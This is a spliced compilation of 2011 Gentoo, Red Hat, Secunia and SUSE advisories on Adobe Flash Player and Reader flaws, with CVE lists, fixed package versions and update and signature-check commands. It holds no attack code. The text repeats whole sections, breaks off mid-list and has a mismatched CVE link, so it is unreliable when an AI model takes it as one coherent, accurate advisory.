[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Red Hat update for flash-plugin
SECUNIA ADVISORY ID:
SA45593
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45593/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
RELEASE DATE:
2011-08-12
DISCUSS ADVISORY:
http://secunia.com/advisories/45593/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45593/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Red Hat has issued an update for flash-plugin. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
disclose sensitive information and compromise a user's system.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY:
RHSA-2011:1144-1:
https://rhn.redhat.com/errata/RHSA-2011-1144.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor
VAR-201108-0183 | CVE-2011-2414 | Adobe Flash Player and Adobe AIR Vulnerable to buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2137, and CVE-2011-2415. Adobe Flash Player and Adobe AIR Contains a buffer overflow vulnerability. This vulnerability CVE-2011-2130 , CVE-2011-2134 , CVE-2011-2137 ,and CVE-2011-2415 Is a different vulnerability.An attacker could execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
